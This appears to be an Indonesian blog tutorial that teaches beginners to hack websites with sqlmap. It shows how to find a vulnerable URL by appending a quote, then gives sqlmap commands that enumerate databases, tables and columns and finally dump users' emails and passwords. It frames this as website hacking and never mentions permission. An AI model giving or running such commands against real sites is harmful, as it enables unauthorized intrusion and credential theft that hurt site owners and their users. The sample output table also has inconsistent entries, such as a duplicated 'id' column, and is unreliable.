Tutorial SQLmap Untuk Pemula

Halo Guys jumpa lagi bersama omheker. ya kali ini omheker akan membagikan Tutorial SQLmap untuk pemula, sebelum itu apakah kalian sudah tau apa itu SQLmap? yuk kita simak penjelasan dibawah ini.

Apa Itu SQlmap?

SQLmap ialah tool atau alat otomatis mengeksploitasi SQL yang sangat populer, dengan menggunakan tool atau alat ini kalian dapat mendapatkan database dari sebuah website dengan mudah dan cepat. Alat ini bisa dikatakan alat untuk hack atau meretas website yang ampuh.

Tutorial Mengunakan SQLmap Untuk Pemula

Misalkan kalian sudah mempunyai target situs untuk di injeksi oleh SQLmap, anggap saja url situs tersebut seperti berikut. 

 site.com/news.php?id=1

Untuk, mengecek apakah situs tersebut vuln atau memiliki celah SQL-I, kalian tinggal menambah kan tanda ' dibelakang url seperti berikut.

 site.com/news.php?id=1'

Untuk memastikan situs tersebut vuln, jika kalian menambahkan ' dibelakang url dan munculnya error ataupun blank berarti situs tersebut vuln atau bisa di injeksi oleh SQLmap dan sebaliknya jika tidak, berarti tidak vuln atau memiliki celah SQL.

oke jika kamu sudah mempunyau target situs yang sudah vuln kamu tinggal lakukan menyalin url situs target terlebih dahulu. Lalu kemduian buka cmd, terminal atau termux kalian, setelah masuk kedalam direktori tool SQLmap, dan running perintah berikut untuk melakukan injeksi ke situs tersebut.

 python2 sqlmap.py "site.com/news.php?id=1" --dbs

Otomatis SQLmap akan menginjeksi situs tersebut, dan akan mengambil database situs tersebut, nah misalkan kalian sudah mendapatkan nama atau info database seperti berikut.

 available databases [2]: 

 [*] information_schema 

 [*] mastahcyber

Selanjutnya jika kalian ingin mengetahui tabel mastahcyber dari database tersebut kalian tinggal, menggunakan perintah berikut.

 python2 sqlmap.py "site.com/news.php?id=1" --tables -D mastahcyber

Setelah kalian mendapatkan tabel dari database tersebut, misalnya kalian mendapatkan tabel sebagai berikut.

 [*] user
[*] admin

Nah jika kalian ingin mengetahui isi tabel, kalian tinggal menggunakan perintah.

 python2 sqlmap.py "site.com/news.php?id=1" --columns -D namadatabase -T namatabel

Contoh kita akan melihat isi tabel user dari database mastahcyber, kita tinggal menggunakan perintah.

 python2 sqlmap.py "site.com/news.php?id=1" --columns -D mastahcyber -T user

Setelah kalian mendapatkan isi dari tabel, misalnya isi tabel tersebut seperti berikut. 

 Table: user [8 columns] 

 +-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash     | varchar(128) |
| id              |    int(11)    |
| name       |    text         |
| password          | text         |
| id                | tinyint(5)   |
| access            | text         |
| system_user       | text       |
+-------------------+--------------+

Nah jika kalian ingin mengetahui email dan password dari dari database mastahcyber dan tabel user, kalian tinggal menggunakan perintah.

 python2 sqlmap.py "site.com/news.php?id=1" --dump -D mastahcyber -T user

Dan kalian pun akan mendapatkan informasi email dan password dari database tersebut.

Oke  mudahkan? oke sekial dulu tutorial dari omheker menggunakan SQLmap untuk pemula, sekian sampai jumpa jika bermanfaat jangan lupa share ya... trima kasih




Penulusuran terkait:

sqlmap online sqlmap termux sqlmap apk cara menggunakan sqlmap cara menggunakan sqlmap di termux

tools sqlmap termux tutorial sqlmap termux cara install sqlmap di termux

Related Posts:

---